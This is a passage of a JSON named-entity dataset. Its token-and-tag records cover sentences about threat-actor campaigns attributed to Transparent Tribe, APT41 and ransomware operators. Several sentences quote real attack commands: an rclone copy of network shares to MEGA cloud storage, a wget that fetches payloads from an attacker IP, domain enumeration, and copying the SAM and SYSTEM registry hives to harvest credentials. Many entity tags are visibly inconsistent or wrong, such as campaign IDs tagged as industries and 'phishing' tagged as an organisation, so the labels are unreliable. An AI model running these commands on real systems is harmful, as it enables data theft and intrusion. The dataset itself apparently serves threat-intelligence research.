"O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0011,", - "Transparent", - "Tribe", - "established", - "SSL", - "certificates", - "on", - "the", - "typo-squatted", - "domains", - "the", - "group", - "registered." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0011,", - "Transparent", - "Tribe", - "registered", - "domains", - "likely", - "designed", - "to", - "appear", - "relevant", - "to", - "student", - "targets", - "in", - "India." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0011,", - "Transparent", - "Tribe", - "relied", - "on", - "a", - "student", - "target", - "to", - "open", - "a", - "malicious", - "document", - "delivered", - "via", - "email." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "C0011,", - "Transparent", - "Tribe", - "relied", - "on", - "student", - "targets", - "to", - "click", - "on", - "a", - "malicious", - "link", - "sent", - "via", - "email." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "C0011,", - "Transparent", - "Tribe", - "sent", - "malicious", - "attachments", - "via", - "email", - "to", - "student", - "targets", - "in", - "India." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0011,", - "Transparent", - "Tribe", - "sent", - "emails", - "containing", - "a", - "malicious", - "link", - "to", - "student", - "targets", - "in", - "India." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0011,", - "Transparent", - "Tribe", - "hosted", - "malicious", - "documents", - "on", - "domains", - "registered", - "by", - "the", - "group." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0011,", - "Transparent", - "Tribe", - "used", - "malicious", - "VBA", - "macros", - "within", - "a", - "lure", - "document", - "as", - "part", - "of", - "the", - "Crimson", - "malware", - "installation", - "process", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0015,", - "the", - "threat", - "actors", - "used", - "DLL", - "files", - "that", - "had", - "invalid", - "certificates." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "Conti", - "ransomware", - "to", - "encrypt", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "limited", - "Rclone's", - "bandwidth", - "setting", - "during", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "obtained", - "files", - "and", - "data", - "from", - "the", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "collected", - "files", - "from", - "network", - "shared", - "drives", - "prior", - "to", - "network", - "encryption." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "use", - "the", - "command", - "`net", - "group", - "\"domain", - "admins\"", - "/dom`", - "to", - "enumerate", - "domain", - "groups." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "the", - "command", - "`nltest", - "/domain_trusts", - "/all_trusts`", - "to", - "enumerate", - "domain", - "trusts." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "a", - "DLL", - "named", - "`D8B3.dll`", - "that", - "was", - "injected", - "into", - "the", - "Winlogon", - "process." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "exfiltrated", - "files", - "and", - "sensitive", - "data", - "to", - "the", - "MEGA", - "cloud", - "storage", - "site", - "using", - "the", - "Rclone", - "command", - "`rclone.exe", - "copy", - "--max-age", - "2y", - "\"\\\\SERVER\\Shares\"", - "Mega:DATA", - "-q", - "--ignore-existing", - "--auto-confirm", - "--multi-thread-streams", - "7", - "--transfers", - "7", - "--bwlimit", - "10M`." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "conducted", - "a", - "file", - "listing", - "discovery", - "against", - "multiple", - "hosts", - "to", - "ensure", - "locker", - "encryption", - "was", - "successful." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "downloaded", - "additional", - "tools", - "and", - "files", - "onto", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "a", - "malicious", - "HTA", - "file", - "that", - "contained", - "a", - "mix", - "of", - "encoded", - "HTML", - "and", - "JavaScript/VBScript", - "code." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "WMI", - "to", - "load", - "Cobalt", - "Strike", - "onto", - "additional", - "hosts", - "within", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "PowerView's", - "file", - "share", - "enumeration", - "results", - "were", - "stored", - "in", - "the", - "file", - "`c:\\ProgramData\\found_shares.txt`." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "the", - "command", - "`net", - "localgroup", - "\"adminstrator\"", - "`", - "to", - "identify", - "accounts", - "with", - "local", - "administrator", - "rights." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "relied", - "on", - "users", - "to", - "enable", - "macros", - "within", - "a", - "malicious", - "Microsoft", - "Word", - "document." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "For", - "C0015,", - "the", - "threat", - "actors", - "used", - "Cobalt", - "Strike", - "and", - "Conti", - "ransomware." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "named", - "a", - "binary", - "file", - "`compareForfor.jpg`", - "to", - "disguise", - "it", - "as", - "a", - "JPG", - "file." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "`mshta`", - "to", - "execute", - "DLLs." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "executed", - "the", - "PowerView", - "ShareFinder", - "module", - "to", - "identify", - "open", - "shares." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "Base64-encoded", - "strings." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "the", - "`tasklist", - "/s`", - "command", - "as", - "well", - "as", - "`taskmanager`", - "to", - "obtain", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "employed", - "code", - "that", - "used", - "`regsvr32`", - "for", - "execution." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "installed", - "the", - "AnyDesk", - "remote", - "desktop", - "application", - "onto", - "the", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "RDP", - "to", - "access", - "specific", - "network", - "hosts", - "of", - "interest." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "the", - "commands", - "`net", - "view", - "/all", - "/domain`", - "and", - "`ping`", - "to", - "discover", - "remote", - "systems.", - "They", - "also", - "used", - "PowerView's", - "PowerShell", - "Invoke-ShareFinder", - "script", - "for", - "file", - "share", - "enumeration." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "loaded", - "DLLs", - "via", - "`rundll32`", - "using", - "the", - "`svchost`", - "process." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "For", - "C0015,", - "security", - "researchers", - "assessed", - "the", - "threat", - "actors", - "likely", - "used", - "a", - "phishing", - "campaign", - "to", - "distribute", - "a", - "weaponized", - "attachment", - "to", - "victims." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "code", - "to", - "obtain", - "the", - "external", - "public-facing", - "IPv4", - "address", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "the", - "command", - "`net", - "view", - "/all", - "time`", - "to", - "gather", - "the", - "local", - "time", - "of", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0015,", - "the", - "threat", - "actors", - "obtained", - "a", - "variety", - "of", - "tools,", - "including", - "AdFind,", - "AnyDesk,", - "and", - "Process", - "Hacker." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "a", - "malicious", - "HTA", - "file", - "that", - "contained", - "a", - "mix", - "of", - "HTML", - "and", - "JavaScript/VBScript", - "code." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "`cmd.exe`", - "to", - "execute", - "commands", - "and", - "run", - "malicious", - "binaries." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0015,", - "the", - "threat", - "actors", - "used", - "`wmic`", - "and", - "`rundll32`", - "to", - "load", - "Cobalt", - "Strike", - "onto", - "a", - "target", - "host." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "a", - "ConfuserEx", - "obfuscated", - "BADPOTATO", - "exploit", - "to", - "abuse", - "named-pipe", - "impersonation", - "for", - "local", - "`NT", - "AUTHORITY\\SYSTEM`", - "privilege", - "escalation." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "hex-encoded", - "PII", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "collected", - "information", - "related", - "to", - "compromised", - "machines", - "as", - "well", - "as", - "Personal", - "Identifiable", - "Information", - "(PII)", - "from", - "victim", - "networks." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "dead", - "drop", - "resolvers", - "on", - "two", - "separate", - "tech", - "community", - "forums", - "for", - "their", - "KEYPLUG", - "Windows-version", - "backdoor;", - "notably", - "APT41", - "updated", - "the", - "community", - "forum", - "posts", - "frequently", - "with", - "new", - "dead", - "drop", - "resolvers", - "during", - "the", - "campaign." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "the", - "DUSTPAN", - "loader", - "to", - "decrypt", - "embedded", - "payloads." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "its", - "Cloudflare", - "services", - "C2", - "channels", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "exfiltrated", - "victim", - "data", - "via", - "DNS", - "lookups", - "by", - "encoding", - "and", - "prepending", - "it", - "as", - "subdomains", - "to", - "the", - "attacker-controlled", - "domain." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "Cloudflare", - "services", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "exploited", - "CVE-2021-44207", - "in", - "the", - "USAHerds", - "application", - "and", - "CVE-2021-44228", - "in", - "Log4j,", - "as", - "well", - "as", - "other", - ".NET", - "deserialization,", - "SQL", - "injection,", - "and", - "directory", - "traversal", - "vulnerabilities", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "abused", - "named", - "pipe", - "impersonation", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "established", - "persistence", - "by", - "loading", - "malicious", - "libraries", - "via", - "modifications", - "to", - "the", - "Import", - "Address", - "Table", - "(IAT)", - "within", - "legitimate", - "Microsoft", - "binaries." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "downloaded", - "malicious", - "payloads", - "onto", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "deployed", - "JScript", - "web", - "shells", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "copied", - "the", - "local", - "`SAM`", - "and", - "`SYSTEM`", - "Registry", - "hives", - "to", - "a", - "staging", - "directory." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "`SCHTASKS", - "/Change`", - "to", - "modify", - "legitimate", - "scheduled", - "tasks", - "to", - "run", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "file", - "names", - "beginning", - "with", - "USERS,", - "SYSUSER,", - "and", - "SYSLOG", - "for", - "DEADEYE,", - "and", - "changed", - "KEYPLUG", - "file", - "extensions", - "from", - ".vmp", - "to", - ".upx", - "likely", - "to", - "avoid", - "hunting", - "detections." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "broke", - "malicious", - "binaries,", - "including", - "DEADEYE", - "and", - "KEYPLUG,", - "into", - "multiple", - "sections", - "on", - "disk", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "frequently", - "configured", - "the", - "URL", - "endpoints", - "of", - "their", - "stealthy", - "passive", - "backdoor", - "LOWKEY.PASSIVE", - "to", - "masquerade", - "as", - "normal", - "web", - "application", - "traffic", - "on", - "an", - "infected", - "server." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "the", - "Cloudflare", - "CDN", - "to", - "proxy", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "the", - "following", - "Windows", - "scheduled", - "tasks", - "for", - "DEADEYE", - "dropper", - "persistence", - "on", - "US", - "state", - "government", - "networks:", - "`\\Microsoft\\Windows\\PLA\\Server", - "Manager", - "Performance", - "Monitor`,", - "`\\Microsoft\\Windows\\Ras\\ManagerMobility`,", - "`\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", - "and", - "`\\Microsoft\\Windows\\WDI\\USOShared`." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "copied", - "the", - "`SAM`", - "and", - "`SYSTEM`", - "Registry", - "hives", - "for", - "credential", - "harvesting." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "VMProtect", - "to", - "slow", - "the", - "reverse", - "engineering", - "of", - "malicious", - "binaries." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "issued", - "`ping", - "-n", - "1", - "((cmd", - "/c", - "dir", - "c:\\|findstr", - "Number).split()[-1]+`", - "commands", - "to", - "find", - "the", - "volume", - "serial", - "number", - "of", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "`cmd.exe", - "/c", - "ping", - "%userdomain%`", - "for", - "discovery." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "`whoami`", - "to", - "gather", - "information", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0017,", - "APT41", - "obtained", - "publicly", - "available", - "tools", - "such", - "as", - "YSoSerial.NET,", - "ConfuserEx,", - "and", - "BadPotato." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "ran", - "`wget", - "http://103.224.80[.]44:8080/kernel`", - "to", - "download", - "malicious", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "the", - "Cloudflare", - "services", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "deployed", - "JScript", - "web", - "shells", - "through", - "the", - "creation", - "of", - "malicious", - "ViewState", - "objects." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0017,", - "APT41", - "used", - "`cmd.exe`", - "to", - "execute", - "reconnaissance", - "commands." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "Base64", - "to", - "encode", - "their", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "AvosLocker", - "ransomware", - "to", - "encrypt", - "files", - "on", - "the", - "compromised", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "exploited", - "VMWare", - "Horizon", - "Unified", - "Access", - "Gateways", - "that", - "were", - "vulnerable", - "to", - "several", - "Log4Shell", - "vulnerabilities,", - "including", - "CVE-2021-44228,", - "CVE-2021-45046,", - "CVE-2021-45105,", - "and", - "CVE-2021-44832." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "downloaded", - "additional", - "tools,", - "such", - "as", - "Mimikatz", - "and", - "Sliver,", - "as", - "well", - "as", - "Cobalt", - "Strike", - "and", - "AvosLocker", - "ransomware", - "onto", - "the", - "victim", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "transferred", - "the", - "SoftPerfect", - "Network", - "Scanner", - 